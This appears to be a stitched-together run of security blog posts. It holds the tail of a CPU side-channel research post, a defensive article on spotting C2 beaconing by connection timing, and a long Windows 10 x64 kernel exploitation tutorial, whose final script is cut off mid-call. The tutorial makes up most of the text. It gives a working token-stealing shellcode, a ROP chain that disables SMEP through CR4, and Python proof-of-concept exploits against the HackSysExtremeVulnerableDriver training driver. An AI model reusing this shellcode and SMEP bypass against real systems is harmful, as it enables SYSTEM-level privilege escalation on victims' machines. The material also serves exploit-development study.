There is so much more I want to do with this work. First of all, this will just be polished in my toolbox and used for future CPU research. It’ll just be a good go-to tool for when I need a little bit more introspection. But, I’m sure as time goes on I’ll come up with new interesting things to monitor. Getting logging of store-port activity would be useful such that we could see the other side of memory transactions.

As with anything I do, performance is always an opportunity for improvement. Getting a higher-fidelity MLPDS exploit, potentially with higher throughput, would always help make collecting data easier. I’ve also got some fun ideas for filtering this data to remove “deterministic noise”. Since we’re attacking from a sibling hyperthread I suspect we’d see some deterministic sliding and interleaving of core usage. If I could isolate these down and remove the noise that’d help a lot.

I hope you enjoyed this blog! See you next time!


Hunting for beacons

By: Fox IT
15 January 2020 at 11:29

Author: Ruud van Luijk

Attacks need to have a form of communication with their victim machines, also known as Command and Control (C2) [1]. This can be in the form of a continuous connection or connect the victim machine directly. However, it’s convenient to have the victim machine connect to you. In other words: It has to communicate back. This blog describes a method to detect one technique utilized by many popular attack frameworks based solely on connection metadata and statistics, in turn enabling this technique to be used on multiple log sources.

Many attack frameworks use beaconing

Frameworks like Cobalt Strike, PoshC2, and Empire, but also some run-in-the-mill malware, frequently check-in at the C2 server to retrieve commands or to communicate results back. In Cobalt Strike this is called a beacon, but concept is similar for many contemporary frameworks. In this blog the term ‘beaconing’ is used as a general term for the call-backs of malware. Previous fingerprinting techniques shows that there are more than a thousand Cobalt Strike servers online in a month that are actively used by several threat actors, making this an important point to focus on.

While the underlying code differs slightly from tool to tool, they often exist of two components to set up a pattern for a connection: a sleep and a jitter. The sleep component indicates how long the beacon has to sleep before checking in again, and the jitter modifies the sleep time so that a random pattern emerges. For example: 60 seconds of sleep with 10% jitter results in a uniformly random sleep between 54 and 66 seconds (PoshC2 [3], Empire [4]) or a uniformly random sleep between 54 and 60 seconds (Cobalt Strike [5]). Note the slight difference in calculation.

This jitter weakens the pattern but will not dissolve the pattern entirely. Moreover, due to the uniform distribution used for the sleep function the jitter is symmetrical. This is in our advantage while detecting this behaviour!

Detecting the beacon

While static signatures are often sufficient in detecting attacks, this is not the case for beaconing. Most frameworks are very customizable to your needs and preferences. This makes it hard to write correct and reliable signatures. Yet, the pattern does not change that much. Therefore, our objective is to find a beaconing pattern in seemingly pattern less connections in real-time using a more anomaly-based method. We encourage other blue teams/defenders to do the same.

Since the average and median of the time between the connections is more or less constant, we can look for connections where the times between consecutive connections constantly stay within a certain range. Regular traffic should not follow such pattern. For example, it makes a few fast-consecutive connections, then a longer time pause, and then again, some interaction. Using a wider range will detect the beacons with a lot of jitter, but more legitimate traffic will also fall in the wider range. There is a clear trade-off between false positives and accounting for more jitter.

In order to track the pattern of connections, we create connection pairs. For example, an IP that connects to a certain host, can be expressed as ’10.0.0.1 -> somerandomhost.com”. This is done for all connection pairs in the network. We will deep dive into one connection pair.

The image above illustrates a beacon is simulated for the pair ’10.0.0.1 -> somerandomhost.com” with a sleep of 1 second and a jitter of 20%, i.e. having a range between 0.8 and 1.2 seconds and the model is set to detect a maximum of 25% jitter. Our model follows the expected timing of the beacon as all connections remain within the lower and upper bound. In general, the more a connection reside within this bandwidth, the more likely it is that there is some sort of beaconing. When a beacon has a jitter of 50% our model has a bandwidth of 25%, it is still expected that half of the beacons will fall within the specified bandwidth.

Even when the configuration of the beacon changes, this method will catch up. The figure above illustrates a change from one to two seconds of sleep whilst maintaining a 10% beaconing. There is a small period after the change where the connections break through the bandwidth, but after several connections the model catches up.

This method can work with any connection pair you want to track. Possibilities include IPs, HTTP(s) hosts, DNS requests, etc. Since it works on only the metadata, this will also help you to hunt for domain fronted beacons (keeping in mind your baseline).

Keep in mind the false positives

Although most regular traffic will not follow a constant pattern, this method will most likely result in several false positives. Every connection that runs on a timer will result in the exact same pattern as beaconing. Example of such connections are windows telemetry, software updates, and custom update scripts. Therefore, some baselining is necessary before using this method for alerting. Still, hunting will always be possible without baselining!

Conclusion

Hunting for C2 beacons proves to be a worthwhile exercise. Real world scenarios confirm the effectiveness of this approach. Depending on the size of the network logs, this method can plow through a month of logs within an hour due to the simplicity of the method. Even when the hunting exercise did not yield malicious results, there are often other applications that act on specific time intervals and are also worth investigating, removing, or altering. While this method will not work when an adversary uses a 100% jitter. Keep in mind that this will probably annoy your adversary, so it’s still a win!

References:

[1]. https://attack.mitre.org/tactics/TA0011/

[2]. https://blog.fox-it.com/2019/02/26/identifying-cobalt-strike-team-servers-in-the-wild/

[3]. https://github.com/nettitude/PoshC2/blob/master/C2-Server.ps1

https://github.com/nettitude/PoshC2_Python/blob/4aea6f957f4aec00ba1f766b5ecc6f3d015da506/Files/Implant-Core.ps1

[4]. https://github.com/EmpireProject/Empire/blob/master/data/agent/agent.ps1

[5]. https://www.cobaltstrike.com/help-beacon

Exploit Development: Panic! At The Kernel - Token Stealing Payloads Revisited on Windows 10 x64 and Bypassing SMEP

1 February 2020 at 00:00

Introduction

Same ol’ story with this blog post- I am continuing to expand my research/overall knowledge on Windows kernel exploitation, in addition to garnering more experience with exploit development in general. Previously I have talked about a couple of vulnerability classes on Windows 7 x86, which is an OS with minimal protections. With this post, I wanted to take a deeper dive into token stealing payloads, which I have previously talked about on x86, and see what differences the x64 architecture may have. In addition, I wanted to try to do a better job of explaining how these payloads work. This post and research also aims to get myself more familiar with the x64 architecture, which is a far more common in 2020, and understand protections such as Supervisor Mode Execution Prevention (SMEP).

Gimme Dem Tokens!

As apart of Windows, there is something known as the SYSTEM process. The SYSTEM process, PID of 4, houses the majority of kernel mode system threads. The threads stored in the SYSTEM process, only run in context of kernel mode. Recall that a process is a “container”, of sorts, for threads. A thread is the actual item within a process that performs the execution of code. You may be asking “How does this help us?” Especially, if you did not see my last post. In Windows, each process object, known as _EPROCESS, has something known as an access token. Recall that an object is a dynamically created (configured at runtime) structure. Continuing on, this access token determines the security context of a process or a thread. Since the SYSTEM process houses execution of kernel mode code, it will need to run in a security context that allows it to access the kernel. This would require system or administrative privilege. This is why our goal will be to identify the access token value of the SYSTEM process and copy it to a process that we control, or the process we are using to exploit the system. From there, we can spawn cmd.exe from the now privileged process, which will grant us NT AUTHORITY\SYSTEM privileged code execution.

Identifying the SYSTEM Process Access Token

We will use Windows 10 x64 to outline this overall process. First, boot up WinDbg on your debugger machine and start a kernel debugging session with your debugee machine (see my post on setting up a debugging enviornment). In addition, I noticed on Windows 10, I had to execute the following command on my debugger machine after completing the bcdedit.exe commands from my previous post: bcdedit.exe /dbgsettings serial debugport:1 baudrate:115200)

Once that is setup, execute the following command, to dump the active processes:

!process 0 0

This returns a few fields of each process. We are most interested in the “process address”, which has been outlined in the image above at address 0xffffe60284651040. This is the address of the _EPROCESS structure for a specified process (the SYSTEM process in this case). After enumerating the process address, we can enumerate much more detailed information about process using the _EPROCESS structure.

dt nt!_EPROCESS <Process address>

dt will display information about various variables, data types, etc. As you can see from the image above, various data types of the SYSTEM process’s _EPROCESS structure have been displayed. If you continue down the kd window in WinDbg, you will see the Token field, at an offset of _EPROCESS + 0x358.

What does this mean? That means for each process on Windows, the access token is located at an offset of 0x358 from the process address. We will for sure be using this information later. Before moving on, however, let’s take a look at how a Token is stored.

As you can see from the above image, there is something called _EX_FAST_REF, or an Executive Fast Reference union. The difference between a union and a structure, is that a union stores data types at the same memory location (notice there is no difference in the offset of the various fields to the base of an _EX_FAST_REF union as shown in the image below. All of them are at an offset of 0x000). This is what the access token of a process is stored in. Let’s take a closer look.

dt nt!_EX_FAST_REF

Take a look at the RefCnt element. This is a value, appended to the access token, that keeps track of references of the access token. On x86, this is 3 bits. On x64 (which is our current architecture) this is 4 bits, as shown above. We want to clear these bits out, using bitwise AND. That way, we just extract the actual value of the Token, and not other unnecessary metadata.

To extract the value of the token, we simply need to view the _EX_FAST_REF union of the SYSTEM process at an offset of 0x358 (which is where our token resides). From there, we can figure out how to go about clearing out RefCnt.

dt nt!_EX_FAST_REF <Process address>+0x358

As you can see, RefCnt is equal to 0y0111. 0y denotes a binary value. So this means RefCnt in this instance equals 7 in decimal.

So, let’s use bitwise AND to try to clear out those last few bits.

? TOKEN & 0xf

As you can see, the result is 7. This is not the value we want- it is actually the inverse of it. Logic tells us, we should take the inverse of 0xf, -0xf.

So- we have finally extracted the value of the raw access token. At this point, let’s see what happens when we copy this token to a normal cmd.exe session.

Openenig a new cmd.exe process on the debuggee machine:

After spawning a cmd.exe process on the debuggee, let’s identify the process address in the debugger.

!process 0 0 cmd.exe

As you can see, the process address for our cmd.exe process is located at 0xffffe6028694d580. We also know, based on our research earlier, that the Token of a process is located at an offset of 0x358 from the process address. Let’s Use WinDbg to overwrite the cmd.exe access token with the access token of the SYSTEM process.

Now, let’s take a look back at our previous cmd.exe process.

As you can see, cmd.exe has become a privileged process! Now the only question remains- how do we do this dynamically with a piece of shellcode?

Assembly? Who Needs It. I Will Never Need To Know That- It’s iRrElEvAnT

‘Nuff said.

Anyways, let’s develop an assembly program that can dynamically perform the above tasks in x64.

So let’s start with this logic- instead of spawning a cmd.exe process and then copying the SYSTEM process access token to it- why don’t we just copy the access token to the current process when exploitation occurs? The current process during exploitation should be the process that triggers the vulnerability (the process where the exploit code is ran from). From there, we could spawn cmd.exe from (and in context) of our current process after our exploit has finished. That cmd.exe process would then have administrative privilege.

Before we can get there though, let’s look into how we can obtain information about the current process.

If you use the Microsoft Docs (formerly known as MSDN) to look into process data structures you will come across this article. This article states there is a Windows API function that can identify the current process and return a pointer to it! PsGetCurrentProcessId() is that function. This Windows API function identifies the current thread and then returns a pointer to the process in which that thread is found. This is identical to IoGetCurrentProcess(). However, Microsoft recommends users invoke PsGetCurrentProgress() instead. Let’s unassemble that function in WinDbg.

uf nt!PsGetCurrentProcess

Let’s take a look at the first instruction mov rax, qword ptr gs:[188h]. As you can see, the GS segment register is in use here. This register points to a data segment, used to access different types of data structures. If you take a closer look at this segment, at an offset of 0x188 bytes, you will see KiInitialThread. This is a pointer to the _KTHREAD entry in the current threads _ETHREAD structure. As a point of contention, know that _KTHREAD is the first entry in _ETHREAD structure. The _ETHREAD structure is the thread object for a thread (similar to how _EPROCESS is the process object for a process) and will display more granular information about a thread. nt!KiInitialThread is the address of that _ETHREAD structure. Let’s take a closer look.

dqs gs:[188h]

This shows the GS segment register, at an offset of 0x188, holds an address of 0xffffd500e0c0cc00 (different on your machine because of ASLR/KASLR). This should be the nt!KiInitialThread, or the _ETHREAD structure for the current thread. Let’s verify this with WinDbg.

!thread -p

As you can see, we have verified that nt!KiInitialThread represents the address of the current thread.

Recall what was mentioned about threads and processes earlier. Threads are the part of a process that actually perform execution of code (for our purposes, these are kernel threads). Now that we have identified the current thread, let’s identify the process associated with that thread (which would be the current process). Let’s go back to the image above where we unassembled the PsGetCurrentProcess() function.

mov rax, qword ptr [rax,0B8h]

RAX alread contains the value of the GS segment register at an offset of 0x188 (which contains the current thread). The above assembly instruction will move the value of nt!KiInitialThread + 0xB8 into RAX. Logic tells us this has to be the location of our current process, as the only instruction left in the PsGetCurrentProcess() routine is a ret. Let’s investigate this further.

Since we believe this is going to be our current process, let’s view this data in an _EPROCESS structure.

dt nt!_EPROCESS poi(nt!KiInitialThread+0xb8)

First, a little WinDbg kung-fu. poi essentially dereferences a pointer, which means obtaining the value a pointer points to.

And as you can see, we have found where our current proccess is! The PID for the current process at this time is the SYSTEM process (PID = 4). This is subject to change dependent on what is executing, etc. But, it is very important we are able to identify the current process.

Let’s start building out an assembly program that tracks what we are doing.

; Windows 10 x64 Token Stealing Payload
; Author: Connor McGarr

[BITS 64]

_start:
	mov rax, [gs:0x188]		    ; Current thread (_KTHREAD)
	mov rax, [rax + 0xb8]	   	    ; Current process (_EPROCESS)
  	mov rbx, rax			    ; Copy current process (_EPROCESS) to rbx

Notice that I copied the current process, stored in RAX, into RBX as well. You will see why this is needed here shortly.

Take Me For A Loop!

Let’s take a look at a few more elements of the _EPROCESS structure.

dt nt!_EPROCESS

Let’s take a look at the data structure of ActiveProcessLinks, _LIST_ENTRY

dt nt!_LIST_ENTRY

ActiveProcessLinks is what keeps track of the list of current processes. How does it keep track of these processes you may be wondering? Its data structure is _LIST_ENTRY, a doubly linked list. This means that each element in the linked list not only points to the next element, but it also points to the previous one. Essentially, the elements point in each direction. As mentioned earlier and just as a point of reiteration, this linked list is responsible for keeping track of all active processes.

There are two elements of _EPROCESS we need to keep track of. The first element, located at an offset of 0x2e0 on Windows 10 x64, is UniqueProcessId. This is the PID of the process. The other element is ActiveProcessLinks, which is located at an offset 0x2e8.

So essentially what we can do in x64 assembly, is locate the current process from the aforementioned method of PsGetCurrentProcess(). From there, we can iterate and loop through the _EPROCESS structure’s ActiveLinkProcess element (which keeps track of every process via a doubly linked list). After reading in the current ActiveProcessLinks element, we can compare the current UniqueProcessId (PID) to the constant 4, which is the PID of the SYSTEM process. Let’s continue our already started assembly program.

; Windows 10 x64 Token Stealing Payload
; Author: Connor McGarr

[BITS 64]

_start:
	mov rax, [gs:0x188]		; Current thread (_KTHREAD)
	mov rax, [rax + 0xb8]	   	; Current process (_EPROCESS)
  	mov rbx, rax			; Copy current process (_EPROCESS) to rbx
	
__loop:
	mov rbx, [rbx + 0x2e8] 		; ActiveProcessLinks
	sub rbx, 0x2e8		   	; Go back to current process (_EPROCESS)
	mov rcx, [rbx + 0x2e0] 		; UniqueProcessId (PID)
	cmp rcx, 4 			; Compare PID to SYSTEM PID 
	jnz __loop			; Loop until SYSTEM PID is found

Once the SYSTEM process’s _EPROCESS structure has been found, we can now go ahead and retrieve the token and copy it to our current process. This will unleash God mode on our current process. God, please have mercy on the soul of our poor little process.

Once we have found the SYSTEM process, remember that the Token element is located at an offset of 0x358 to the _EPROCESS structure of the process.

Let’s finish out the rest of our token stealing payload for Windows 10 x64.

; Windows 10 x64 Token Stealing Payload
; Author: Connor McGarr

[BITS 64]

_start:
	mov rax, [gs:0x188]		; Current thread (_KTHREAD)
	mov rax, [rax + 0xb8]		; Current process (_EPROCESS)
	mov rbx, rax			; Copy current process (_EPROCESS) to rbx
__loop:
	mov rbx, [rbx + 0x2e8] 		; ActiveProcessLinks
	sub rbx, 0x2e8		   	; Go back to current process (_EPROCESS)
	mov rcx, [rbx + 0x2e0] 		; UniqueProcessId (PID)
	cmp rcx, 4 			; Compare PID to SYSTEM PID 
	jnz __loop			; Loop until SYSTEM PID is found

	mov rcx, [rbx + 0x358]		; SYSTEM token is @ offset _EPROCESS + 0x358
	and cl, 0xf0			; Clear out _EX_FAST_REF RefCnt
	mov [rax + 0x358], rcx		; Copy SYSTEM token to current process

	xor rax, rax			; set NTSTATUS SUCCESS
	ret				; Done!

Notice our use of bitwise AND. We are clearing out the last 4 bits of the RCX register, via the CL register. If you have read my post about a socket reuse exploit, you will know I talk about using the lower byte registers of the x86 or x64 registers (RCX, ECX, CX, CH, CL, etc). The last 4 bits we need to clear out , in an x64 architecture, are located in the low or L 8-bit register (CL, AL, BL, etc).

As you can see also, we ended our shellcode by using bitwise XOR to clear out RAX. NTSTATUS uses RAX as the regsiter for the error code. NTSTATUS, when a value of 0 is returned, means the operations successfully performed.

Before we go ahead and show off our payload, let’s develop an exploit that outlines bypassing SMEP. We will use a stack overflow as an example, in the kernel, to outline using ROP to bypass SMEP.

SMEP Says Hello

What is SMEP? SMEP, or Supervisor Mode Execution Prevention, is a protection that was first implemented in Windows 8 (in context of Windows). When we talk about executing code for a kernel exploit, the most common technique is to allocate the shellcode in user mode and the call it from the kernel. This means the user mode code will be called in context of the kernel, giving us the applicable permissions to obtain SYSTEM privileges.

SMEP is a prevention that does not allow us execute code stored in a ring 3 page from ring 0 (executing code from a higher ring in general). This means we cannot execute user mode code from kernel mode. In order to bypass SMEP, let’s understand how it is implemented.

SMEP policy is mandated/enabled via the CR4 register. According to Intel, the CR4 register is a control register. Each bit in this register is responsible for various features being enabled on the OS. The 20th bit of the CR4 register is responsible for SMEP being enabled. If the 20th bit of the CR4 register is set to 1, SMEP is enabled. When the bit is set to 0, SMEP is disabled. Let’s take a look at the CR4 register on Windows with SMEP enabled in normal hexadecimal format, as well as binary (so we can really see where that 20th bit resides).

r cr4

The CR4 register has a value of 0x00000000001506f8 in hexadecimal. Let’s view that in binary, so we can see where the 20th bit resides.

.formats cr4

As you can see, the 20th bit is outlined in the image above (counting from the right). Let’s use the .formats command again to see what the value in the CR4 register needs to be, in order to bypass SMEP.

As you can see from the above image, when the 20th bit of the CR4 register is flipped, the hexadecimal value would be 0x00000000000506f8.

This post will cover how to bypass SMEP via ROP using the above information. Before we do, let’s talk a bit more about SMEP implementation and other potential bypasses.

SMEP is ENFORCED via the page table entry (PTE) of a memory page through the form of “flags”. Recall that a page table is what contains information about which part of physical memory maps to virtual memory. The PTE for a memory page has various flags that are associated with it. Two of those flags are U, for user mode or S, for supervisor mode (kernel mode). This flag is checked when said memory is accessed by the memory management unit (MMU). Before we move on, lets talk about CPU modes for a second. Ring 3 is responsible for user mode application code. Ring 0 is responsible for operating system level code (kernel mode). The CPU can transition its current privilege level (CPL) based on what is executing. I will not get into the lower level details of syscalls, sysrets, or other various routines that occur when the CPU changes the CPL. This is also not a blog on how paging works. If you are interested in learning more, I HIGHLY suggest the book What Makes It Page: The Windows 7 (x64) Virtual Memory Manager by Enrico Martignetti. Although this is specific to Windows 7, I believe these same concepts apply today. I give this background information, because SMEP bypassses could potentially abuse this functionality.

Think of the implementation of SMEP as the following:

Laws are created by the government. HOWEVER, the legislatures do not roam the streets enforcing the law. This is the job of our police force.

The same concept applies to SMEP. SMEP is enabled by the CR4 register- but the CR4 register does not enforce it. That is the job of the page table entries.

Why bring this up? Athough we will be outlining a SMEP bypass via ROP, let’s consider another scenario. Let’s say we have an arbitrary read and write primitive. Put aside the fact that PTEs are randomized for now. What if you had a read primitive to know where the PTE for the memory page of your shellcode was? Another potential (and interesting) way to bypass SMEP would be not to “disable SMEP” at all. Let’s think outside the box! Instead of “going to the mountain”- why not “bring the mountain to us”? We could potentially use our read primitive to locate our user mode shellcode page, and then use our write primitive to overwrite the PTE for our shellcode and flip the U (usermode) flag into an S (supervisor mode) flag! That way, when that particular address is executed although it is a “user mode address”, it is still executed because now the permissions of that page are that of a kernel mode page.

Although page table entries are randomized now, this presentation by Morten Schenk of Offensive Security talks about derandomizing page table entries.

Morten explains the steps as the following, if you are too lazy to read his work:

  1. Obtain read/write primitive
  2. Leak ntoskrnl.exe (kernel base)
  3. Locate MiGetPteAddress() (can be done dynamically instead of static offsets)
  4. Use PTE base to obtain PTE of any memory page
  5. Change bit (whether it is copying shellcode to page and flipping NX bit or flipping U/S bit of a user mode page)

Again, I will not be covering this method of bypassing SMEP until I have done more research on memory paging in Windows. See the end of this blog for my thoughts on other SMEP bypasses going forward.

SMEP Says Goodbye

Let’s use the an overflow to outline bypasssing SMEP with ROP. ROP assumes we have control over the stack (as each ROP gadget returns back to the stack). Since SMEP is enabled, our ROP gagdets will need to come from kernel mode pages. Since we are assuming medium integrity here, we can call EnumDeviceDrivers() to obtain the kernel base- which bypasses KASLR.

Essentially, here is how our ROP chain will work

-------------------
pop <reg> ; ret
-------------------
VALUE_WANTED_IN_CR4 (0x506f8) - This can be our own user supplied value.
-------------------
mov cr4, <reg> ; ret
-------------------
User mode payload address
-------------------

Let’s go hunting for these ROP gadgets. (NOTE - ALL OFFSETS TO ROP GADGETS WILL VARY DEPENDING ON OS, PATCH LEVEL, ETC.) Remember, these ROP gadgets need to be kernel mode addresses. We will use rp++ to enumerate rop gadgets in ntoskrnl.exe. If you take a look at my post about ROP, you will see how to use this tool.

Let’s figure out a way to control the contents of the CR4 register. Although we won’t probably won’t be able to directly manipulate the contents of the register directly, perhaps we can move the contents of a register that we can control into the CR4 register. Recall that a pop <reg> operation will take the contents of the next item on the stack, and store it in the register following the pop operation. Let’s keep this in mind.

Using rp++, we have found a nice ROP gadget in ntoskrnl.exe, that allows us to store the contents of CR4 in the ecx register (the “second” 32-bits of the RCX register.)

As you can see, this ROP gadget is “located” at 0x140108552. However, since this is a kernel mode address- rp++ (from usermode and not ran as an administrator) will not give us the full address of this. However, if you remove the first 3 bytes, the rest of the “address” is really an offset from the kernel base. This means this ROP gadget is located at ntoskrnl.exe + 0x108552.

Awesome! rp++ was a bit wrong in its enumeration. rp++ says that we can put ECX into the CR4 register. Howerver, upon further inspection, we can see this ROP gadget ACTUALLY points to a mov cr4, rcx instruction. This is perfect for our use case! We have a way to move the contents of the RCX register into the CR4 register. You may be asking “Okay, we can control the CR4 register via the RCX register- but how does this help us?” Recall one of the properties of ROP from my previous post. Whenever we had a nice ROP gadget that allowed a desired intruction, but there was an unecessary pop in the gadget, we used filler data of NOPs. This is because we are just simply placing data in a register- we are not executing it.

The same principle applies here. If we can pop our intended flag value into RCX, we should have no problem. As we saw before, our intended CR4 register value should be 0x506f8.

Real quick with brevity- let’s say rp++ was right in that we could only control the contents of the ECX register (instead of RCX). Would this affect us?

Recall, however, how the registers work here.

-----------------------------------
               RCX
-----------------------------------
                       ECX
-----------------------------------
                             CX
-----------------------------------
                           CH    CL
-----------------------------------

This means, even though RCX contains 0x00000000000506f8, a mov cr4, ecx would take the lower 32-bits of RCX (which is ECX) and place it into the CR4 register. This would mean ECX would equal 0x000506f8- and that value would end up in CR4. So even though we would theoretically using both RCX and ECX, due to lack of pop ecx ROP gadgets, we will be unaffected!

Now, let’s continue on to controlling the RCX register.

Let’s find a pop rcx gadget!

Nice! We have a ROP gadget located at ntoskrnl.exe + 0x3544. Let’s update our POC with some breakpoints where our user mode shellcode will reside, to verify we can hit our shellcode. This POC takes care of the semantics such as finding the offset to the ret instruction we are overwriting, etc.

import struct
import sys
import os
from ctypes import *

kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi


payload = bytearray(
    "\xCC" * 50
)

# Defeating DEP with VirtualAlloc. Creating RWX memory, and copying our shellcode in that region.
# We also need to bypass SMEP before calling this shellcode
print "[+] Allocating RWX region for shellcode"
ptr = kernel32.VirtualAlloc(
    c_int(0),                         # lpAddress
    c_int(len(payload)),              # dwSize
    c_int(0x3000),                    # flAllocationType
    c_int(0x40)                       # flProtect
)

# Creates a ctype variant of the payload (from_buffer)
c_type_buffer = (c_char * len(payload)).from_buffer(payload)

print "[+] Copying shellcode to newly allocated RWX region"
kernel32.RtlMoveMemory(
    c_int(ptr),                       # Destination (pointer)
    c_type_buffer,                    # Source (pointer)
    c_int(len(payload))               # Length
)

# Need kernel leak to bypass KASLR
# Using Windows API to enumerate base addresses
# We need kernel mode ROP gadgets

# c_ulonglong because of x64 size (unsigned __int64)
base = (c_ulonglong * 1024)()

print "[+] Calling EnumDeviceDrivers()..."

get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    sizeof(base),                     # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)
)

# Error handling if function fails
if not base:
    print "[+] EnumDeviceDrivers() function call failed!"
    sys.exit(-1)

# The first entry in the array with device drivers is ntoskrnl base address
kernel_address = base[0]

print "[+] Found kernel leak!"
print "[+] ntoskrnl.exe base address: {0}".format(hex(kernel_address))

# Offset to ret overwrite
input_buffer = "\x41" * 2056

# SMEP says goodbye
print "[+] Starting ROP chain. Goodbye SMEP..."
input_buffer += struct.pack('<Q', kernel_address + 0x3544)      # pop rcx; ret

print "[+] Flipped SMEP bit to 0 in RCX..."
input_buffer += struct.pack('<Q', 0x506f8)           		# Intended CR4 value

print "[+] Placed disabled SMEP value in CR4..."
input_buffer += struct.pack('<Q', kernel_address + 0x108552)    # mov cr4, rcx ; ret

print "[+] SMEP disabled!"
input_buffer += struct.pack('<Q', ptr)                          # Location of user mode shellcode

input_buffer_length = len(input_buffer)

# 0x222003 = IOCTL code that will jump to TriggerStackOverflow() function
# Getting handle to driver to return to DeviceIoControl() function
print "[+] Using CreateFileA() to obtain and return handle referencing the driver..."
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile
)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
print "[+] Interacting with the driver..."
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x222003,                           # dwIoControlCode
    input_buffer,                       # lpInBuffer
    input_buffer_length,                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

Let’s take a look in WinDbg.

As you can see, we have hit the ret we are going to overwrite.

Before we step through, let’s view the call stack- to see how execution will proceed.

k

Open the image above in a new tab if you are having trouble viewing.

To help better understand the output of the call stack, the column Call Site is going to be the memory address that is executed. The RetAddr column is where the Call Site address will return to when it is done completing.

As you can see, the compromised ret is located at HEVD!TriggerStackOverflow+0xc8. From there we will return to 0xfffff80302c82544, or AuthzBasepRemoveSecurityAttributeValueFromLists+0x70. The next value in the RetAddr column, is the intended value for our CR4 register, 0x00000000000506f8.

Recall that a ret instruction will load RSP into RIP. Therefore, since our intended CR4 value is located on the stack, technically our first ROP gadget would “return” to 0x00000000000506f8. However, the pop rcx will take that value off of the stack and place it into RCX. Meaning we do not have to worry about returning to that value, which is not a valid memory address.

Upon the ret from the pop rcx ROP gadget, we will jump into the next ROP gadget, mov cr4, rcx, which will load RCX into CR4. That ROP gadget is located at 0xfffff80302d87552, or KiFlushCurrentTbWorker+0x12. To finish things out, we have the location of our user mode code, at 0x0000000000b70000.

After stepping through the vulnerable ret instruction, we see we have hit our first ROP gadget.

Now that we are here, stepping through should pop our intended CR4 value into RCX

Perfect. Stepping through, we should land on our next ROP gadget- which will move RCX (desired value to disable SMEP) into CR4.

Perfect! Let’s disable SMEP!

Nice! As you can see, after our ROP gadgets are executed - we hit our breakpoints (placeholder for our shellcode to verify SMEP is disabled)!

This means we have succesfully disabled SMEP, and we can execute usermode shellcode! Let’s finalize this exploit with a working POC. We will merge our payload concepts with the exploit now! Let’s update our script with weaponized shellcode!

import struct
import sys
import os
from ctypes import *

kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi


payload = bytearray(
    "\x65\x48\x8B\x04\x25\x88\x01\x00\x00"              # mov rax,[gs:0x188]  ; Current thread (KTHREAD)
    "\x48\x8B\x80\xB8\x00\x00\x00"                      # mov rax,[rax+0xb8]  ; Current process (EPROCESS)
    "\x48\x89\xC3"                                      # mov rbx,rax         ; Copy current process to rbx
    "\x48\x8B\x9B\xE8\x02\x00\x00"                      # mov rbx,[rbx+0x2e8] ; ActiveProcessLinks
    "\x48\x81\xEB\xE8\x02\x00\x00"                      # sub rbx,0x2e8       ; Go back to current process
    "\x48\x8B\x8B\xE0\x02\x00\x00"                      # mov rcx,[rbx+0x2e0] ; UniqueProcessId (PID)
    "\x48\x83\xF9\x04"                                  # cmp rcx,byte +0x4   ; Compare PID to SYSTEM PID
    "\x75\xE5"                                          # jnz 0x13            ; Loop until SYSTEM PID is found
    "\x48\x8B\x8B\x58\x03\x00\x00"                      # mov rcx,[rbx+0x358] ; SYSTEM token is @ offset _EPROCESS + 0x348
    "\x80\xE1\xF0"                                      # and cl, 0xf0        ; Clear out _EX_FAST_REF RefCnt
    "\x48\x89\x88\x58\x03\x00\x00"                      # mov [rax+0x358],rcx ; Copy SYSTEM token to current process
    "\x48\x83\xC4\x40"                                  # add rsp, 0x40       ; RESTORE (Specific to HEVD)
    "\xC3"                                              # ret                 ; Done!
)

# Defeating DEP with VirtualAlloc. Creating RWX memory, and copying our shellcode in that region.
# We also need to bypass SMEP before calling this shellcode
print "[+] Allocating RWX region for shellcode"
ptr = kernel32.VirtualAlloc(
    c_int(0),                         # lpAddress
    c_int(len(payload)),              # dwSize
    c_int(0x3000),                    # flAllocationType
    c_int(0x40)                       # flProtect
)

# Creates a ctype variant of the payload (from_buffer)
c_type_buffer = (c_char * len(payload)).from_buffer(payload)

print "[+] Copying shellcode to newly allocated RWX region"
kernel32.RtlMoveMemory(
    c_int(ptr),                       # Destination (pointer)
    c_type_buffer,                    # Source (pointer)
    c_int(len(payload))               # Length
)

# Need kernel leak to bypass KASLR
# Using Windows API to enumerate base addresses
# We need kernel mode ROP gadgets

# c_ulonglong because of x64 size (unsigned __int64)
base = (c_ulonglong * 1024)()

print "[+] Calling EnumDeviceDrivers()..."

get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    sizeof(base),                     # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)
)

# Error handling if function fails
if not base:
    print "[+] EnumDeviceDrivers() function call failed!"
    sys.exit(-1)

# The first entry in the array with device drivers is ntoskrnl base address
kernel_address = base[0]

print "[+] Found kernel leak!"
print "[+] ntoskrnl.exe base address: {0}".format(hex(kernel_address))

# Offset to ret overwrite
input_buffer = ("\x41" * 2056)

# SMEP says goodbye
print "[+] Starting ROP chain. Goodbye SMEP..."
input_buffer += struct.pack('<Q', kernel_address + 0x3544)      # pop rcx; ret

print "[+] Flipped SMEP bit to 0 in RCX..."
input_buffer += struct.pack('<Q', 0x506f8)           		        # Intended CR4 value

print "[+] Placed disabled SMEP value in CR4..."
input_buffer += struct.pack('<Q', kernel_address + 0x108552)    # mov cr4, rcx ; ret

print "[+] SMEP disabled!"
input_buffer += struct.pack('<Q', ptr)                          # Location of user mode shellcode

input_buffer_length = len(input_buffer)

# 0x222003 = IOCTL code that will jump to TriggerStackOverflow() function
# Getting handle to driver to return to DeviceIoControl() function
print "[+] Using CreateFileA() to obtain and return handle referencing the driver..."
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
